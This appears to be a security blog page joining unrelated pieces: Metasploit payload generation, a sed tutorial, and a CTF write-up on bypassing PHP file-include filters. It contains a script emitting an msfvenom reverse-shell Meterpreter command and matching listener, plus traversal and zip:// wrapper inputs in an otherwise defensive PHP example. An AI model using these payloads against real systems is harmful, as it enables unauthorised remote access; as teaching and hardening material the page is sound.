One of the most useful (and, to the beginner, most underrated) abilities of Metasploit is the msfpayload utility (since replaced by msfvenom). It can produce a stand-alone payload in many formats, which is what gives you a shell in almost any situation. For each of these payloads, open msfconsole and select exploit/multi/handler. Run 'set payload' with the same payload you generated, configure the necessary options (LHOST, LPORT, etc.), then execute and wait for the payload to be run on the target. For the examples below the options are self-explanatory: LHOST is your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet, in which case that port must be forwarded to the machine running the listener), and LPORT is the port you wish to be connected back on. The payload name, LHOST and LPORT given to the handler must match the ones baked into the generated payload, or the connection will never arrive.
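The following is an added example, not code from the original article: a small POSIX shell script that derives both the msfvenom command and the multi/handler resource script from one set of parameters, so the payload name, LHOST and LPORT cannot drift apart between the two. The payload, address and port are placeholder assumptions.

```shell
#!/bin/sh
# Added example: keep the generated payload and the listener in sync by
# producing both from the same parameters. Constructed for this page; the
# payload name, 192.0.2.10 and 4444 below are placeholders.

# LPORT must be a number in 1..65535.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# LHOST must look like a dotted-quad IPv4 address with sane octets.
valid_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for o in $(echo "$1" | tr '.' ' '); do
        [ "$o" -le 255 ] || return 1
    done
}

# Emit the msfconsole resource script for exploit/multi/handler.
# ExitOnSession false + exploit -j keeps the listener up for more callbacks.
handler_rc() {
    payload=$1; lhost=$2; lport=$3
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
}

# Emit the msfvenom command that builds the matching payload.
venom_cmd() {
    payload=$1; lhost=$2; lport=$3; fmt=$4; out=$5
    echo "msfvenom -p $payload LHOST=$lhost LPORT=$lport -f $fmt -o $out"
}

# Usage with placeholder values. Save the first output as handler.rc and
# start the listener with: msfconsole -q -r handler.rc
handler_rc windows/meterpreter/reverse_tcp 192.0.2.10 4444
venom_cmd  windows/meterpreter/reverse_tcp 192.0.2.10 4444 exe payload.exe
```

Because both commands read the same three variables, a typo in the port or a staged/stageless payload mismatch shows up once, in one place, instead of as a listener that silently never receives a session.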
Sed is the ultimate stream editor
Category: Articles
The sed stream editor is a text editor that performs editing operations on text coming from standard input or from a file. sed edits line by line and non-interactively.
In general, sed operates on a stream of text that it reads either from standard input or from a file. This means you can send the output of another command directly into sed for editing, or you can work on a file you have already created. You should also be aware that sed writes everything to standard output by default: unless you redirect it (or use in-place editing), sed prints its output to the screen rather than saving it to a file, and the input file is left unchanged.
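The following is an added example, not part of the original article. It shows both modes described above on a few constructed sshd-style log lines: sed fed from a pipe to pull the source address out of every failed login, and sed run over a file to redact addresses, with the file itself left untouched because no `-i` or redirection is used.

```shell
#!/bin/sh
# Added example of sed in pipe mode and file mode.
# The log lines below are constructed for this example, not real data.
SAMPLE_LOG='Mar  1 10:02:11 host sshd[2211]: Failed password for root from 203.0.113.7 port 51022 ssh2
Mar  1 10:02:15 host sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51030 ssh2
Mar  1 10:03:40 host sshd[2240]: Accepted publickey for alice from 198.51.100.4 port 40110 ssh2
Mar  1 10:04:02 host sshd[2260]: Failed password for alice from 198.51.100.9 port 40200 ssh2'

# Pipe mode: stdin -> sed -> stdout. -n suppresses the default print and the
# trailing p prints only lines where the substitution matched, so the output
# is exactly one source IP per failed login; sort -u dedupes them.
failed_login_ips() {
    printf '%s\n' "$SAMPLE_LOG" |
        sed -n 's/.*Failed password for .* from \([0-9.]*\) port.*/\1/p' |
        sort -u
}

# File mode: sed reads the file and writes the edited copy to stdout. Without
# -i the file on disk is not modified, which the grep at the end checks.
redacted_log() {
    tmp=$(mktemp) || return 1
    printf '%s\n' "$SAMPLE_LOG" > "$tmp"
    sed 's/\([0-9]\{1,3\}\.\)\{3\}[0-9]\{1,3\}/[redacted]/g' "$tmp"
    # The original still contains both lines with 203.0.113.7.
    [ "$(grep -c '203\.0\.113\.7' "$tmp")" -eq 2 ] || { rm -f "$tmp"; return 1; }
    rm -f "$tmp"
}

# Usage: list offending addresses, then print a shareable redacted copy.
failed_login_ips
redacted_log
```

To keep the redacted version, redirect it (`redacted_log > clean.log`); to change the file in place you would pass `-i` to sed, which is exactly the behaviour the default does not have.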
Cracking ZIP and RAR protected files with John the Ripper
Bypassing PHP Null Byte Injection protections
Overview
This post is the second part of the Bypassing PHP Null Byte Injection protections blog post. If you want to try the CTF before going through the write-up, head to the link first. Otherwise, keep on reading :)
The main trick described in this write-up relies on a Local File Include (LFI) vulnerability that is exploitable, but only within some restrictions imposed by the code. Among these restrictions, there is active filtering of path traversal sequences. Namely, an image file extension (.png) is always appended to successfully uploaded files. In addition, the server runs an up-to-date version of PHP, which is not vulnerable to the well-known Null Byte Injection trick (current PHP rejects include paths that contain a NUL byte, so the appended extension can no longer be truncated away).
To bypass these restrictions and achieve Remote Code Execution through the aforementioned LFI vulnerability, one can use one of PHP's built-in wrappers, as described in detail in the next section of this write-up.
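The following is an added example, not the CTF's code and not the write-up's own solution (its next section is not reproduced on this page). It shows the shape of the include pattern just described (a traversal filter and a forced .png extension) next to a hardened version. The pages directory, the page names and the use of the zip:// wrapper in the comments are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed example for this page. PAGES_DIR and the allowlist are assumed;
// the zip:// wrapper mentioned below is one standard PHP wrapper, used here
// as an illustration of why string filtering alone does not stop an LFI.

const PAGES_DIR = __DIR__ . '/pages';

// BEFORE: the shape of the LFI the write-up describes. The traversal filter
// runs once, the extension is forced, and NUL truncation does not work on
// current PHP (include() refuses any path containing "\0").
function page_path_vulnerable(string $page): string
{
    $page = str_replace('../', '', $page);   // "....//" collapses back to "../"
    return $page . '.png';
    // A wrapper prefix survives the concatenation unchanged:
    //   zip://uploads/x.png#shell  ->  zip://uploads/x.png#shell.png
    // and include() executes the PHP inside that archive entry whatever
    // its name ends in, so the forced extension buys nothing.
}

// AFTER: never build an include path from user input. Resolve the request
// against a fixed allowlist and refuse everything else, so neither a wrapper
// scheme nor a traversal sequence ever reaches the stream layer.
function page_path_hardened(string $page): ?string
{
    static $allowed = ['home', 'about', 'contact'];   // assumed page names
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . '/' . $page . '.php');
    // Defence in depth: the resolved file must still live under PAGES_DIR.
    if ($base === false || $real === false
        || strncmp($real, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function render(string $page): void
{
    $path = page_path_hardened($page);
    if ($path === null) {
        http_response_code(404);
        echo 'no such page';
        return;
    }
    include $path;
}

// What each path builder does with a benign and two hostile inputs
// (%23 is a URL-encoded '#', the separator zip:// uses for the entry name).
foreach (['home', '....//....//etc/passwd', 'zip://uploads/x.png%23shell'] as $in) {
    $decoded = urldecode($in);
    echo $in, "\n  vulnerable: ", page_path_vulnerable($decoded),
         "\n  hardened:   ", page_path_hardened($decoded) ?? 'rejected', "\n";
}
```

The point of the hardened version is that the user-supplied string is only ever compared against known names, never concatenated into the path, so the question of which wrappers or encodings the filter forgot about never arises.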